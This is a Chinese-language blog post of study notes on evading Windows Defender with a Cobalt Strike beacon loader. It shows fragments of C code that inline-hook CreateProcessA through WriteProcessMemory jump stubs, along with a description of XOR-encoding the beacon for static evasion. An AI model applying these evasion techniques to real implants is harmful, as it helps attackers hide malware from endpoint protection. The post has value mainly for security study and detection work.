

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  
    <meta name="description" content="本文的操作方法都是在shellcode加载器中制作是一个制作方法  不是骚操作 需要很强的免杀编写能力 不是一蹴而就 需要慢慢学习 执行shell whoami 时 cs做了什么？调用createprocessA来创建一个cmd进程来执行命令，而windowsdefender会对创建进程的进程进行内存查杀 即使用了xor加密了 但在内存中还是得解密运行 解密后内存一扫就被发现了  那么我们要做的就">
<meta property="og:type" content="article">
<meta property="og:title" content="hooksleep 绕wdf">
<meta property="og:url" content="http://example.com/2022/12/20/%E5%88%A9%E7%94%A8hook%E7%BB%95%E8%BF%87windowsdefender%E5%8A%A8%E6%80%81%E6%9F%A5%E6%9D%80/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="本文的操作方法都是在shellcode加载器中制作是一个制作方法  不是骚操作 需要很强的免杀编写能力 不是一蹴而就 需要慢慢学习 执行shell whoami 时 cs做了什么？调用createprocessA来创建一个cmd进程来执行命令，而windowsdefender会对创建进程的进程进行内存查杀 即使用了xor加密了 但在内存中还是得解密运行 解密后内存一扫就被发现了  那么我们要做的就">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209031937664.png">
<meta property="og:image" content="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209032028981.png">
<meta property="og:image" content="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209032029096.png">
<meta property="og:image" content="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209032029231.png">
<meta property="og:image" content="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209032029225.png">
<meta property="og:image" content="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209031939900.png">
<meta property="og:image" content="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209031939456.png">
<meta property="og:image" content="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209031940664.png">
<meta property="og:image" content="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209031941992.png">
<meta property="og:image" content="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209031941693.png">
<meta property="og:image" content="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209031942549.png">
<meta property="og:image" content="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209031942735.png">
<meta property="og:image" content="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209031946225.png">
<meta property="og:image" content="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209031947371.png">
<meta property="og:image" content="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209031948084.png">
<meta property="og:image" content="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209031948829.png">
<meta property="og:image" content="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209031948814.png">
<meta property="og:image" content="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209031949465.png">
<meta property="og:image" content="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209031949263.png">
<meta property="og:image" content="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209031949281.png">
<meta property="og:image" content="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209031954555.png">
<meta property="og:image" content="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209031955703.png">
<meta property="og:image" content="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209031956917.png">
<meta property="og:image" content="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209031956593.png">
<meta property="og:image" content="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209131549406.gif">
<meta property="og:image" content="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209131555605.gif">
<meta property="og:image" content="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209141503127.gif">
<meta property="og:image" content="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209141521843.png">
<meta property="og:image" content="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209141525541.gif">
<meta property="article:published_time" content="2022-12-20T13:19:43.720Z">
<meta property="article:modified_time" content="2023-02-20T10:30:04.000Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="学习笔记">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209031937664.png">
  
  
  
  <title>hooksleep 绕wdf - Hexo</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.4","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Fluid</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>Home</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>Archives</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                <span>Categories</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>Tags</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>About</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="hooksleep 绕wdf"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2022-12-20 21:19" pubdate>
          December 20, 2022 pm
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          18k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          151 mins
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">hooksleep 绕wdf</h1>
            
            
              <div class="markdown-body">
                
                <h2 id="本文的操作方法都是在shellcode加载器中制作"><a href="#本文的操作方法都是在shellcode加载器中制作" class="headerlink" title="本文的操作方法都是在shellcode加载器中制作"></a>本文的操作方法都是在shellcode加载器中制作</h2><p>是一个制作方法  不是骚操作 需要很强的免杀编写能力 不是一蹴而就 需要慢慢学习</p>
<h2 id="执行shell-whoami-时-cs做了什么？"><a href="#执行shell-whoami-时-cs做了什么？" class="headerlink" title="执行shell whoami 时 cs做了什么？"></a>执行shell whoami 时 cs做了什么？</h2><p>调用createprocessA来创建一个cmd进程来执行命令，而windowsdefender会对创建进程的进程进行内存查杀</p>
<p><img src="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209031937664.png" srcset="/img/loading.gif" lazyload alt="image-20220903193732547">即使用了xor加密了 但在内存中还是得解密运行</p>
<p>解密后内存一扫就被发现了  那么我们要做的就是扫描时候再次加密自己</p>
<h2 id="绕过尝试"><a href="#绕过尝试" class="headerlink" title="绕过尝试"></a>绕过尝试</h2><p><img src="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209032028981.png" srcset="/img/loading.gif" lazyload alt="image-20220903202852892"><img src="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209032029096.png" srcset="/img/loading.gif" lazyload alt="image-20220903202907018"><img src="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209032029231.png" srcset="/img/loading.gif" lazyload alt="image-20220903202918172"><img src="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209032029225.png" srcset="/img/loading.gif" lazyload alt="image-20220903202934166">后面的ff e0就是跳转到刚才rax寄存器的地址中</p>
<p>如果是x86的话，因为地址时4个字节，就传送到eax寄存器中</p>
<p><img src="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209031939900.png" srcset="/img/loading.gif" lazyload alt="image-20220903193907846">之后用writeprocessmemory将数据写入来覆盖api的开头<img src="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209031939456.png" srcset="/img/loading.gif" lazyload alt="image-20220903193954396"></p>
<p>这样一来当调用这个函数时就会进入我们自己编写的mycreateprocessA<img src="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209031940664.png" srcset="/img/loading.gif" lazyload alt="image-20220903194048592"></p>
<p><img src="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209031941992.png" srcset="/img/loading.gif" lazyload alt="image-20220903194129918"><img src="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209031941693.png" srcset="/img/loading.gif" lazyload alt="image-20220903194158616"> </p>
<p><img src="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209031942549.png" srcset="/img/loading.gif" lazyload alt="image-20220903194237489"><img src="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209031942735.png" srcset="/img/loading.gif" lazyload alt="image-20220903194250619"></p>
<p><img src="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209031946225.png" srcset="/img/loading.gif" lazyload alt="image-20220903194631168"></p>
<p><img src="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209031947371.png" srcset="/img/loading.gif" lazyload alt="image-20220903194748315"><img src="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209031948084.png" srcset="/img/loading.gif" lazyload alt="image-20220903194804019"></p>
<p><img src="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209031948829.png" srcset="/img/loading.gif" lazyload alt="image-20220903194817779"></p>
<p><img src="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209031948814.png" srcset="/img/loading.gif" lazyload alt="image-20220903194857759"></p>
<p><img src="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209031949465.png" srcset="/img/loading.gif" lazyload alt="image-20220903194915407"><img src="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209031949263.png" srcset="/img/loading.gif" lazyload alt="image-20220903194933202"></p>
<p><img src="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209031949281.png" srcset="/img/loading.gif" lazyload alt="image-20220903194959219"></p>
<h2 id="调试"><a href="#调试" class="headerlink" title="调试"></a>调试</h2><p><img src="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209031954555.png" srcset="/img/loading.gif" lazyload alt="image-20220903195436498"></p>
<p>继续跟踪<img src="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209031955703.png" srcset="/img/loading.gif" lazyload alt="image-20220903195524643"></p>
<p><img src="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209031956917.png" srcset="/img/loading.gif" lazyload alt="image-20220903195601855"></p>
<p><img src="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209031956593.png" srcset="/img/loading.gif" lazyload alt="image-20220903195611522"></p>
<p>这样就可以尽情shell了</p>
<h2 id="本地测试"><a href="#本地测试" class="headerlink" title="本地测试"></a>本地测试</h2><p>方法一:</p>
<p>直接新建项目</p>
<p>然后把cpp源码copy进去 然后生成解决方案 就能自动生成exe文件 </p>
<p>可以的  错误代码改一下就好</p>
<p>方法二:</p>
<p>先打开cpp源码</p>
<p>然后关掉  然后再去打开visual Studio 2019.exe创建新的项目”windows桌面运行程序” 它会根据历史记录自动生成*.h *.cpp *.rc *.ico *.vcxproj 等文件</p>
<p>然后生成解决方案 就能自动生成exe文件</p>
<p><img src="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209131549406.gif" srcset="/img/loading.gif" lazyload></p>
<p>可以的  先再测一下wdf检测</p>
<p>随便执行个shell看看</p>
<p><img src="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209131555605.gif" srcset="/img/loading.gif" lazyload></p>
<p>可以看到成功跳转到我们的mycreateprocessA</p>
<h2 id="源码分析"><a href="#源码分析" class="headerlink" title="源码分析"></a>源码分析</h2><h3 id="xor"><a href="#xor" class="headerlink" title="xor"></a>xor</h3><p>先看一下静态绕过吧</p>
<p>就是个异或</p>
<p>open(“beacon.bin”, “rb”)</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-built_in">ord</span>(code)<br>格式：<span class="hljs-built_in">ord</span>(“字符串“）<br>说明： 函数返回值类型为 <span class="hljs-built_in">int</span>类型<br>例如 ： <span class="hljs-built_in">ord</span>(“<span class="hljs-number">0</span>”),结果显示：<span class="hljs-number">48</span><br>^ 按位异或运算符<br><br>python的encode()方法将会返回经过指定编码格式编码后的字符串，它是一个 <span class="hljs-built_in">bytes</span> 对象。<br><br>在获取<span class="hljs-built_in">hex</span><br>取<span class="hljs-number">16</span>进制<br><br></code></pre></td></tr></table></figure>





<h3 id="shellcode加载器-cpp"><a href="#shellcode加载器-cpp" class="headerlink" title="shellcode加载器.cpp"></a>shellcode加载器.cpp</h3><p>####结构体</p>
<p>优先看一下结构体</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">StructOptions</span></span><br><span class="hljs-class">&#123;</span><br>    LPCSTR lpApplicationName;<br>    LPSTR lpCommandLine;<br>    LPSECURITY_ATTRIBUTES lpProcessAttributes;<br>    LPSECURITY_ATTRIBUTES lpThreadAttributes;<br>    BOOL bInheritHandles;<br>    DWORD dwCreationFlags;<br>    LPVOID lpEnvironment;<br>    LPCSTR lpCurrentDirectory;<br>    LPSTARTUPINFOA lpStartupInfo;<br>    LPPROCESS_INFORMATION lpProcessInformation;<br>&#125; *optionsData;<br></code></pre></td></tr></table></figure>



<p>除了最下面的”*optionsData“之外剩下的是createprocess</p>
<p>创建进程的结构体</p>
<p> <code>LPCSTR lpApplicationName</code>：应用程序名称</p>
<p>进程的名称，显示在任务管理器中。</p>
<p>需要注意的是，传入的字符串需要是<code>const</code>类的常量字符串。</p>
<p> <code>LPSTR lpCommandLine</code>：命令行参数</p>
<p>从命令行中启动时传入的参数，跟在应用名称后，中间空一个空格。</p>
<p><code>main()</code>函数的<code>argv[1]</code> 和 <code>winMain()</code>函数的<code>lpCmdLine</code>接收的就是命令行中传入的字符串。</p>
<p>在启动浏览器程序是，在命令行参数中传入网址，浏览器会默认打开此网址。例如：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs c">C:\Users\SSTS&gt;cd C:\Program <span class="hljs-title function_">Files</span> <span class="hljs-params">(x86)</span>\Microsoft\Edge\Application<br><br>C:\Program <span class="hljs-title function_">Files</span> <span class="hljs-params">(x86)</span>\Microsoft\Edge\Application&gt;msedge.exe https:<span class="hljs-comment">//www.baidu.com</span><br><br></code></pre></td></tr></table></figure>



<p>LPSECURITY_ATTRIBUTES lpProcessAttributes&#96;</p>
<p>进程的安全属性</p>
<p><code>LPSECURITY_ATTRIBUTES lpThreadAttributes</code></p>
<p>线程的安全属性</p>
<p><code>BOOL bInheritHandles</code></p>
<p>句柄继承标志</p>
<p><code>LPVOID lpEnvironment</code></p>
<p>指向新的环境块的指针</p>
<p><code>LPCSTR lpCurrentDirectory</code></p>
<p>向当前目录名的指针</p>
<p><code>LPSTARTUPINFOA lpStartupInfo</code>：要创建的程序的样式</p>
<p>默认设置为全空（结构中的字段全部为0），由于微软为了以后的扩展打算，需要通过<code>cb</code>字段，手动设置该结构体的大小。</p>
<p> <code>LPPROCESS_INFORMATION lpProcessInformation</code>：进程创建完返回的信息</p>
<p><code>OUT</code>类型的参数，该结构用于接收进程创建完返回的信息，包括进程句柄，进程ID，主线程句柄，主线程ID。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-keyword">typedef</span> <span class="hljs-class"><span class="hljs-keyword">struct</span> _<span class="hljs-title">PROCESS_INFORMATION</span> &#123;</span>							<br> HANDLE hProcess;				<span class="hljs-comment">//进程句柄			</span><br> HANDLE hThread;				<span class="hljs-comment">//主进程句柄			</span><br> DWORD dwProcessId;				<span class="hljs-comment">//进程ID			</span><br> DWORD dwThreadId;				<span class="hljs-comment">//线程ID			</span><br>&#125; PROCESS_INFORMATION, *PPROCESS_INFORMATION, *LPPROCESS_INFORMATION;<br><br></code></pre></td></tr></table></figure>



<p><code>*optionsData</code></p>
<p>暂时不清楚</p>
<h4 id="Hook函数"><a href="#Hook函数" class="headerlink" title="Hook函数"></a>Hook函数</h4><h5 id="private"><a href="#private" class="headerlink" title="private:"></a>private:</h5><p>static StructHook hookData[2];静态hook数据表</p>
<p>先整数指针地址 转 字节数组  addrToBytes</p>
<p>{</p>
<p>   先给原来的字节码用malloc分配8字节的内存</p>
<p>   memcpy内存拷贝函数拷贝b</p>
<p>  return 字节数组</p>
<p>}</p>
<p>inline hook</p>
<p>static bool writeMemory(StructHook* hookData)(hook常用)</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs c">&#123;<br><br>     <span class="hljs-keyword">if</span> (hookData-&gt;APIAddr == <span class="hljs-number">0</span>) <span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;<br><br>&#125;<br><br>    MEMORY_BASIC_INFORMATION memoryInfo;<br><br><span class="hljs-keyword">if</span> (VirtualQueryEx((HANDLE)<span class="hljs-number">-1</span>, (LPCVOID)hookData-&gt;callback, &amp;memoryInfo, <span class="hljs-keyword">sizeof</span>(memoryInfo)) != <span class="hljs-keyword">sizeof</span>(memoryInfo))<br>&#123;<br>    <span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;<br>&#125;<br><span class="hljs-comment">//虽然不知道什么意思 但是其实也是个套用模板吧</span><br><br></code></pre></td></tr></table></figure>

<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-comment">//修改内存保护属性</span><br>        DWORD lpflOldProtect = <span class="hljs-number">0</span>;<br>        <span class="hljs-type">bool</span> isEditSuccess = VirtualProtectEx(<br>            (HANDLE)<span class="hljs-number">-1</span>, memoryInfo.BaseAddress, <span class="hljs-number">8</span>, <span class="hljs-number">64</span>, &amp;lpflOldProtect<br>        );<br><span class="hljs-comment">//其实也是个套用模板</span><br><span class="hljs-keyword">if</span> (isEditSuccess == <span class="hljs-number">0</span>) <span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;<br><span class="hljs-comment">//虽然不知道什么意思 但是其实也是个套用模板吧</span><br></code></pre></td></tr></table></figure>

<p>UINT8 asmBytes[7] &#x3D; { 0xB8,0,0,0,0,0xFF,0xE0 }; &#x2F;&#x2F;x86</p>
<p>UINT8 asmBytes[12] &#x3D; { 0x48,0xb8,0,0,0,0,0,0,0,0,0xFF,0xE0 };&#x2F;&#x2F;x64</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-keyword">if</span> (hookData-&gt;isHooked)<br>        &#123;<br>            <span class="hljs-comment">// 若已经被HOOK，则暂停hook,字节码恢复为初始的状态；</span><br>            <span class="hljs-comment">// x86 为 7</span><br>            <span class="hljs-built_in">memcpy</span>(asmBytes, hookData-&gt;oldBytes, <span class="hljs-number">12</span>);<br>            hookData-&gt;isHooked = <span class="hljs-literal">false</span>;<br>        &#125;<br><span class="hljs-comment">//其实也是个套用模板</span><br></code></pre></td></tr></table></figure>



<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs c">&#123;<br>            <span class="hljs-comment">// 若未被HOOK，则将我们的回调地址写汇编。</span><br>            <span class="hljs-comment">// x86 地址为 4, asmBytes + 1</span><br>    		<span class="hljs-comment">// 故x68为memcpy(asmBytes + 1, addrToBytes(hookData-&gt;callback), 4);</span><br>            <span class="hljs-built_in">memcpy</span>(asmBytes + <span class="hljs-number">2</span>, addrToBytes(hookData-&gt;callback), <span class="hljs-number">8</span>);<br>            hookData-&gt;isHooked = <span class="hljs-literal">true</span>;<br>        &#125;<br></code></pre></td></tr></table></figure>

<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-comment">// 将汇编指令写入到内存中</span><br>        <span class="hljs-comment">// x86 为 7</span><br>        <span class="hljs-keyword">if</span> (WriteProcessMemory((HANDLE)<span class="hljs-number">-1</span>, hookData-&gt;APIAddr, asmBytes, <span class="hljs-number">12</span>, <span class="hljs-literal">NULL</span>)) <span class="hljs-keyword">return</span> <span class="hljs-literal">true</span>;<br>        <span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;<br><span class="hljs-comment">//其实也是个套用模板</span><br></code></pre></td></tr></table></figure>



<h5 id="public"><a href="#public" class="headerlink" title="public"></a>public</h5><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-comment">// 开始 hook</span><br><span class="hljs-comment">// // 安装 参数：DLL名称、API名称、回调地址</span><br><span class="hljs-type">static</span> <span class="hljs-type">bool</span> <span class="hljs-title function_">install</span><span class="hljs-params">(<span class="hljs-built_in">string</span> DLLName, <span class="hljs-built_in">string</span> APIName, <span class="hljs-type">void</span>* callBack, <span class="hljs-type">int</span> hookDataNumber)</span><br>    &#123;<br>    <span class="hljs-type">bool</span> isHookExist = <span class="hljs-literal">false</span>;<br>    <span class="hljs-type">int</span> index = <span class="hljs-number">-1</span>;<br><span class="hljs-comment">//其实也是个套用模板</span><br>    HMODULE moduleH = GetModuleHandleA(DLLName.c_str());<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;callBack=%llx\n&quot;</span>, callBack);<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;moduleH=%llx\n&quot;</span>, moduleH);<br></code></pre></td></tr></table></figure>

<p>hookData[hookDataNumber].APIName &#x3D; APIName;<br>hookData[hookDataNumber].DLLName &#x3D; DLLName;<br>hookData[hookDataNumber].DLLAndAPIName &#x3D; DLLName + APIName;</p>
<p>hookData[hookDataNumber].APIAddr &#x3D; GetProcAddress(moduleH, APIName.c_str());<br>hookData[hookDataNumber].callback &#x3D; callBack;</p>
<p>&#x2F;&#x2F;利用上文自定义的hookDataNumber  并赋值</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs c"> <span class="hljs-comment">// 获取原来的字节码</span><br>        <span class="hljs-comment">// x86 为 7</span><br>        hookData[hookDataNumber].oldBytes = (UINT8*)<span class="hljs-built_in">malloc</span>(<span class="hljs-number">12</span>);<br>        <span class="hljs-built_in">memcpy</span>(hookData[hookDataNumber].oldBytes, (<span class="hljs-type">void</span>*)hookData[hookDataNumber].APIAddr, <span class="hljs-number">12</span>);<br><span class="hljs-comment">//其实也是个套用模板 不过需要根据自身定义情况进行相应改编</span><br><br></code></pre></td></tr></table></figure>

